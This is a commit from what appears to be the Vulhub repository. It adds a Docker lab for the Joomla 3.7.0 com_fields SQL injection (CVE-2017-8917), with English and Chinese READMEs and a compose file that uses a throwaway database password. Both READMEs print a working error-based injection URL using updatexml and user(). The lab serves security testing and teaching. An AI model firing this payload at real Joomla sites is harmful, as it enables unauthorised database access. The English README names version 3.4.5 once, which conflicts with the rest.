first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

BIN
joomla/CVE-2017-8917/1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 82 KiB

View File

@@ -0,0 +1,32 @@
# Joomla 3.7.0 com_fields SQL Injection Vulnerability (CVE-2017-8917)
[中文版本(Chinese version)](README.zh-cn.md)
Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
An SQL injection vulnerability is caused by a new component, com_fields, which was introduced in version 3.7.
References:
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
## Vulnerable environment
Executing following command to start a Joomla 3.4.5:
```
docker compose up -d
```
After the server is started, you can see the home page of it at `http://your-ip:8080`.
## Exploit
Visit following link directly to reproduce the SQL injection attack:
```
http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
```
![](1.png)

View File

@@ -0,0 +1,26 @@
# Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
Joomla是一个开源免费的内容管理系统CMS基于PHP开发。
Joomla在3.7.0中新引入的一个组件“com_fields”这个组件任何人都可以访问无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
参考链接:
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
## 测试环境
执行如下命令启动一个Joomla 3.7.0服务:
```
docker compose up -d
```
启动后访问`http://your-ip:8080`即可看到Joomla的安装界面和测试数据。
## 漏洞复现
直接访问`http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)`即可看到SQL报错信息
![](1.png)

View File

@@ -0,0 +1,18 @@
version: '2'
services:
web:
image: vulhub/joomla:3.7.0
depends_on:
- mysql
environment:
- JOOMLA_DB_HOST=mysql
- JOOMLA_DB_PORT=3306
- JOOMLA_DB_USER=root
- JOOMLA_DB_PASSWORD=vulhub
- JOOMLA_DB_NAME=joomla
ports:
- "8080:80"
mysql:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=vulhub